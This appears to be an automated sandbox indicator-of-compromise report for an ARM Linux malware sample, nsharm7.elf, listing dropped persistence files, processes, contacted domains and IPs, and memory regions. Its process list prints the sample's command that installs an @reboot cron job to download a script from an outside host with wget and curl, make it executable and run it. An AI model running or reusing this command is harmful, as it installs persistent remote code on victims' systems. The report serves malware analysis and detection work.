IOC Report
nsharm7.elf

loading gif

Files

File Path
Type
Category
Malicious
nsharm7.elf
ELF 32-bit LSB executable, ARM, EABI4 version 1 (SYSV), statically linked, stripped
initial sample
malicious
/root/.bashrc
ASCII text
dropped
malicious
/var/spool/cron/crontabs/tmp.QYPaEb
ASCII text
dropped
malicious
/etc/init/bot.conf
ASCII text
dropped

Processes

Path
Cmdline
Malicious
/tmp/nsharm7.elf
/tmp/nsharm7.elf
/tmp/nsharm7.elf
-
/bin/sh
/bin/sh -c "(crontab -l ; echo \"@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh\") | crontab -"
/bin/sh
-
/bin/sh
-
/usr/bin/crontab
crontab -l
/bin/sh
-
/usr/bin/crontab
crontab -
/tmp/nsharm7.elf
-
/bin/sh
/bin/sh -c "/sbin/initctl start bot"
/bin/sh
-
/tmp/nsharm7.elf
-
/tmp/nsharm7.elf
-
/tmp/nsharm7.elf
-
There are 4 hidden processes, click here to show them.

URLs

Name
IP
Malicious
http://hailcocks.ru/wget.sh;
unknown

Domains

Name
IP
Malicious
daisy.ubuntu.com
162.213.35.24
kingstonwikkerink.dyn
81.29.149.178

IPs

IP
Domain
Country
Malicious
88.151.195.22
unknown
Azerbaijan
193.233.193.45
unknown
Russian Federation
81.29.149.178
kingstonwikkerink.dyn
Switzerland
91.149.218.232
unknown
Poland

Memdumps

Base Address
Regiontype
Protect
Malicious
7f81c04e5000
page read and write
7f81c052a000
page read and write
7f81c01b7000
page read and write
7ffd4ad06000
page execute read
7f81b8021000
page read and write
55d0e2290000
page read and write
7ffd4ace2000
page read and write
7f81c0398000
page read and write
7f81bfbdb000
page read and write
7ffd4ad06000
page execute read
7ffd4ace2000
page read and write
7f81c0398000
page read and write
7f80b8038000
page read and write
7f81c04e5000
page read and write
7f81b8021000
page read and write
55d0e2290000
page read and write
55d0e2279000
page execute and read and write
55d0e3b3a000
page read and write
7f81bfe46000
page read and write
55d0e2279000
page execute and read and write
7f81befdf000
page read and write
7f81c04c1000
page read and write
7f81bf879000
page read and write
7f81c04c1000
page read and write
55d0e2279000
page execute and read and write
7f80b8030000
page execute read
7f81bfe69000
page read and write
7f81befdf000
page read and write
7f80b8030000
page execute read
55d0e3b3a000
page read and write
7f81bffd5000
page read and write
7f81befdf000
page read and write
7f80b8040000
page read and write
7f81b8021000
page read and write
7f81bffd5000
page read and write
7f81c01b7000
page read and write
7f80b8030000
page execute read
7f81bf879000
page read and write
7f81b7fff000
page read and write
7f81c04c1000
page read and write
55d0e0272000
page read and write
7f81bf879000
page read and write
55d0e027b000
page read and write
7ffd4ad06000
page execute read
7f81bfe69000
page read and write
55d0e0021000
page execute read
7f81bffd5000
page read and write
7f81bfe46000
page read and write
55d0e3b3a000
page read and write
7ffd4ace2000
page read and write
7f81bf7e7000
page read and write
7f80b8040000
page read and write
7f81c04e5000
page read and write
7f81bf7e7000
page read and write
55d0e0021000
page execute read
7f81bfbdb000
page read and write
7f80b8040000
page read and write
7f81bf7e7000
page read and write
55d0e027b000
page read and write
7f80b8038000
page read and write
7f81b7fff000
page read and write
7f81c052a000
page read and write
55d0e0272000
page read and write
55d0e0021000
page execute read
7f81b7fff000
page read and write
7f81c0398000
page read and write
55d0e027b000
page read and write
7f81c01b7000
page read and write
7f81bfe46000
page read and write
7f81bfe69000
page read and write
7f80b8038000
page read and write
55d0e2290000
page read and write
55d0e0272000
page read and write
7f81c052a000
page read and write
7f81bfbdb000
page read and write
There are 65 hidden memdumps, click here to show them.